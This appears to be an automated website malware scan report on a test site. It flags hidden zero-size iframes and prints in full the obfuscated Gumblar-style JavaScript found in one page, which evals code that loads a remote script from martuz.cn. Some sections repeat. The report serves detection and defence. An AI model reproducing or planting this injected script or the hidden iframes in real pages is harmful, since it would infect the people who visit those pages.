Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newspaper-site.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://newspaper-site.com/ | 200 OK Content-Length: 1273 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://thejumpbeat.com <iframe src="http://thejumpbeat.com" width="0" height="0"> | ||
http://newspaper-site.com/binary/clam.pdf | 200 OK Content-Length: 7277 Content-Type: application/pdf | clean |
http://newspaper-site.com/test404page.js | 404 Not Found Content-Length: 412 Content-Type: text/html | clean |
http://newspaper-site.com/binary/clam.exe | 200 OK Content-Length: 544 Content-Type: application/x-msdos-program | clean |
http://newspaper-site.com/binary/clam.zip | 200 OK Content-Length: 404 Content-Type: application/zip | clean |
http://newspaper-site.com/binary/trojan-swizzor.exe | 200 OK Content-Length: 251904 Content-Type: application/x-msdos-program | clean |
http://newspaper-site.com/malware.pdf | 200 OK Content-Length: 27304 Content-Type: application/pdf | clean |
http://newspaper-site.com/gumblar.html | 200 OK Content-Length: 807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(Aq7){var IhZef=('va_72_20a_3d_22Sc_72i_70tEn_67ine_22_2cb_3d_22V_65_72s_69o_6e()+_22_2cj_3d_22_22_2cu_3dna_76_69gator_2euser_41ge_6et_3b_69f(_28_75_2ein_64_65xOf(_22Chro_6de_22_29_3c0_29_26_26_28u_2eindexOf_28_22_57_69n_22_29_3e0_29_26_26(u_2ei_6ed_65x_4ff(_22NT_20_36_22_29_3c0_29_26_26(_64ocument_2eco_6fk_69_65_2e_69_6edexOf(_22miek_3d1_22)_3c0_29_26_26(typ_65o_66(zr_76zts)_21_3dty_70_65of_28_22_41_22)_29)_7b_7a_72vz_74s_3d_22_41_22_3b_65val(_22_69_66(wind_6fw_2e_22_2ba+_22)_6a_3d_6a+_22+_61_2b_22M_61_6a_6fr_22+b+a+_22_4dinor_22_2bb+a_2b_22Bui_6cd_22+_62_2b_22j_3b_22)_3bdocume_6et_2e_77_72ite(_22_3cscrip_74_20s_72_63_3d_2f_2fm_22+_22artuz_2ecn_2fv_69d_2f_3fid_3d_22+j_2b_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d').replace(Aq7,'%');eval(unescape(IhZef))})(/\_/g); --> Antivirus reports:
| ||
http://newspaper-site.com/infected_page.html | 200 OK Content-Length: 10081 Content-Type: text/html | suspicious |
Hidden iFrame found. size: x0 src: http://www.foobar.cn <iframe height=0 src="http://www.foobar.cn"> | ||
http://newspaper-site.com/hxxp://chshun.cn | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://empty52.cn | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://showwo1.cn | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://badf3.cn | 404 Not Found Content-Length: 413 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://mvoyo.com/1.js | 404 Not Found Content-Length: 419 Content-Type: text/html | clean |
http://newspaper-site.com/hxxp://17gamo.com/1.js | 404 Not Found Content-Length: 420 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newspaper-site.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 22:01:57 GMT
Accept-Ranges: bytes
ETag: "3498d9d-4f9-47e18d02149c0"
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_python/3.3.1 Python/2.6.2 mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Length: 1273
Content-Type: text/html
Last-Modified: Tue, 26 Jan 2010 22:29:03 GMT
...1273 bytes of data.
GET / HTTP/1.1
Host: newspaper-site.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 22:01:57 GMT
Accept-Ranges: bytes
ETag: "3498d9d-4f9-47e18d02149c0"
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_python/3.3.1 Python/2.6.2 mod_ssl/2.2.11 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Length: 1273
Content-Type: text/html
Last-Modified: Tue, 26 Jan 2010 22:29:03 GMT
...1273 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: newspaper-site.com
Referer: http://www.google.com/search?q=newspaper-site.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: newspaper-site.com
Referer: http://www.google.com/search?q=newspaper-site.com
Result:
The result is similar to the first query. There are no suspicious redirects found.